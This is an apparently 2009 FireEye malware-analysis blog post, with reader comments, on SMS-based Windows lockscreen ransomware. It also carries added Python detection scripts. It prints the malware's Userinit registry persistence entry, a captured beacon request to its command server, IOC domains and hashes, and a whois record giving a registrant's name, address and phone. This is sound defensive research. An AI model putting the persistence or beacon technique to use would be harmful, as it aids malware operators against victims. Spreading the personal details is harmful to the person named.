RansomWare on the loose..
Update: A little more investigation revealed how this SMS-based ransom works. The short codes use paid "rooms", a concept similar to 1900 numbers, where it costs money to call in. Every time someone sends an SMS to one of these rooms, a fixed amount of money is deducted from the sender's balance and transferred to the owner of the room.
There has been a disturbing uptick in "Ransomware" over the past couple of weeks. Most modern malware tries its hardest to hide its presence on the system, but Rogue AVs and Ransomware are, by their nature, as in-your-face as they can be. Recently I got a chance to analyze a couple of these samples. One of them was 6211D3AF9D2EE3DCD44C948A4ECF6633. Upon execution, this malware blocks the user's access to all Windows resources and demands money (a ransom) from the victim in return for unlocking the system.
After getting infected, the only thing the user can see is the following message, which appears to be in Russian (Cyrillic):
With the help of an online Russian keyboard and Google Translate, I was able to translate this text into readable English. Here is the translated text, which isn't perfect, but you should be able to glean the gist:
"Windows blocked
to unlock the need to send an sms with the text
412857964
to number
3649
Enter the resulting code:
attempt to reinstall the system may lead to loss
important information and violations of the computer"
Obviously these guys are doing it to get some quick ransom money. I'm not sure what happens when victims contact them via SMS, as it's region specific. I suspect the code mentioned above (412857964) is dynamically generated by the malware and that the unlocking key is created from this code once the malware authors receive the ransom.
Note: Symantec recently wrote a technical report about this malware threat and also provided a tool to generate the unlock key. Unfortunately, this tool doesn't work for the variant mentioned above. Instead of a 10- or 11-digit code starting with 411, this new variant has a 9-digit code starting with 412. Another interesting fact, as shown in the VirusTotal report: of the 19 listed AVs that detected this malware as a threat, Norton Anti-Virus is not one of them.
Here are some of the notable changes this malware makes on the victim's PC.
It creates a startup registry entry like this:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ Userinit =C:\WINDOWS\System32\userinit.exe,c:\malware.exe
This means that every time the user logs in to the system, a malware instance is launched alongside userinit.exe (a legitimate Windows process responsible for loading user profiles, which contain desktop themes, fonts, wallpapers, etc.).
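As an added example that is not part of the original post, here is a small Python check that parses a Winlogon Userinit value the way the entry above is written and flags anything other than the legitimate userinit.exe. The sample values are constructed from the entry shown, the Windows directory is assumed to be C:\WINDOWS unless given, and read_live_userinit is a hypothetical helper for running the same check on a Windows host.

```python
import ntpath

# Constructed sample values: the first is the Userinit entry quoted in the
# post, the second is what a clean Windows XP install leaves behind.
SAMPLE_INFECTED = r"C:\WINDOWS\System32\userinit.exe,c:\malware.exe"
SAMPLE_CLEAN = r"C:\WINDOWS\system32\userinit.exe,"

WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"


def parse_userinit(value):
    """Split the Userinit REG_SZ into the executables Winlogon will launch.

    Winlogon treats the value as a comma-separated list; a clean install
    carries a trailing comma, which yields an empty entry that is dropped.
    """
    entries = []
    for part in value.split(","):
        part = part.strip().strip('"')
        if part:
            entries.append(part)
    return entries


def suspicious_userinit_entries(value, windir=r"C:\WINDOWS"):
    """Return every launch entry that is not the legitimate userinit.exe.

    Paths are compared case-insensitively after expanding %SystemRoot%;
    the Windows directory defaults to the one assumed above.
    """
    expected = ntpath.normcase(ntpath.join(windir, "System32", "userinit.exe"))
    flagged = []
    for entry in parse_userinit(value):
        normalised = ntpath.normcase(entry.replace("%SystemRoot%", windir))
        if normalised != expected:
            flagged.append(entry)
    return flagged


def read_live_userinit():
    """Hypothetical helper: read the value from the live registry (Windows only)."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY) as key:
        value, _kind = winreg.QueryValueEx(key, "Userinit")
    return value


if __name__ == "__main__":
    for label, value in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        print(label, "->", suspicious_userinit_entries(value) or "clean")
```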
Here is the observed outbound communication:
GET /registerguid.php?guid={98607c80-9a71-494f-a81e-32b7bb536a0c}&wid=59&u=6&number=35743798&install=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: ogggooogoggoog.com
Connection: Keep-Alive
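As an added example that is not part of the original post, here is Python detection logic that flags the registerguid.php beacon above (and the getid.php variant mentioned in the comments) in proxy log lines. The log format, the client IPs and the 203.0.113.10 host are constructed assumptions; the domains are the ones named on the page.

```python
from urllib.parse import urlsplit, parse_qs

# Domains named on the page (the post and its comments).
KNOWN_HOSTS = {"ogggooogoggoog.com", "9aga999a9gg99a.com", "zsgszzzszggzzs.com"}
# Beacon scripts seen on the page and the query parameters each one carries.
BEACON_SCRIPTS = {"registerguid.php": {"guid", "wid"}, "getid.php": {"getcode", "wid"}}
# The hard-coded user-agent from the captured request.
BEACON_UA = "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

# Constructed proxy log, one request per line: src_ip<TAB>method<TAB>url<TAB>user_agent
SAMPLE_LOG = """\
10.0.0.5\tGET\thttp://ogggooogoggoog.com/registerguid.php?guid={98607c80-9a71-494f-a81e-32b7bb536a0c}&wid=59&u=6&number=35743798&install=1\tMozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
10.0.0.7\tGET\thttp://www.example.com/index.php?wid=59\tMozilla/5.0 (Windows; U)
10.0.0.9\tGET\thttp://203.0.113.10/getid.php?getcode=1&wid=53&client=Explorer.EXE&u=1\tMozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
"""


def classify_request(url, user_agent):
    """Return the reasons this request looks like the SMS-ransomware beacon."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    params = set(parse_qs(parts.query).keys())
    reasons = []
    if parts.hostname in KNOWN_HOSTS:
        reasons.append("known ransomware domain")
    required = BEACON_SCRIPTS.get(script)
    # Script name plus its characteristic parameters catches new hosts/IPs too.
    if required and required <= params:
        reasons.append(f"{script} beacon with {sorted(required)}")
    # The UA alone is weak evidence, so it only corroborates another hit.
    if reasons and user_agent == BEACON_UA:
        reasons.append("hard-coded IE6 beta user-agent")
    return reasons


def scan_log(text):
    """Return (src_ip, url, reasons) for every flagged line in the proxy log."""
    hits = []
    for line in text.splitlines():
        src, _method, url, ua = line.split("\t", 3)
        reasons = classify_request(url, ua)
        if reasons:
            hits.append((src, url, reasons))
    return hits


if __name__ == "__main__":
    for src, url, reasons in scan_log(SAMPLE_LOG):
        print(src, url, "->", "; ".join(reasons))
```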
Whois lookup for ogggooogoggoog.com is the following (the Administrative, Technical and Billing contacts repeat the Registrant details verbatim, so they are listed once):
Domain Name: OGGGOOOGOGGOOG.COM
Registrant:
Damir I Filatovskij
Damir I Filatovskij ( )
ul. Kuncevskaja 134/2 11
Moskva
Moskva, 120023
RU
Tel. +7.4992746592
Fax. +7.4992746592
Creation Date: 04-Mar-2009
Expiration Date: 04-Mar-2010
Domain servers in listed order:
dns2.naunet.ru
dns1.naunet.ru
Administrative Contact, Technical Contact, Billing Contact: same as Registrant
Status: ACTIVE
Unfortunately, this is not the end of Ransomware. Here is another sample I found (1587c55956d7df0673b4bebe1dfd2de3) that has a different look and feel, but the same overall intent. There are a few differences as well; for instance, this one also modifies registry keys to disable Windows "Safe Mode".
In this case I am not completely able to understand the language used on lines 7 to 9, except for words like 6008, SMS, and flip. However, the reason for its existence (hijacking a victim's OS) is clear. It would be great if some readers could point me in the right direction as to how to render this text so that it can be translated. I suspect a character encoding/language pack mismatch.
Luckily, these two pieces of malware do not attempt to corrupt user data files like we saw in the case of FileFixer (another ransomware). Re-imaging the infected machine essentially rids you of these pieces of malware, but this is obviously very cumbersome. The old method of having a system drive and a data drive would have saved you from any major data loss. This also makes it easier to re-image in the future. And with 1TB hard drives being sub-$100, there's no excuse not to back up your data!
Atif Mushtaq @ FireEye Malware Intelligence Lab
Question/Comments : research SHIFT-2 fireeye DOT COM
In the last screenshot the "strange" language is Russian, but in the wrong encoding.
Posted by: Mart | 2009.04.22 at 12:11 AM
Do we know who's providing the SMS shortcode number?
Posted by: MysteryFCM | 2009.04.22 at 08:06 AM
Found two other related domains that resolve to the same IP as ogggooogoggoog.com. They are 9aga999a9gg99a.com and zsgszzzszggzzs.com. File requests are a little different (getid.php?getcode=1&wid=53&client=Explorer.EXE&u=1), but it's obviously the same family of ransomware.
Posted by: Matt Sully | 2009.04.22 at 08:18 AM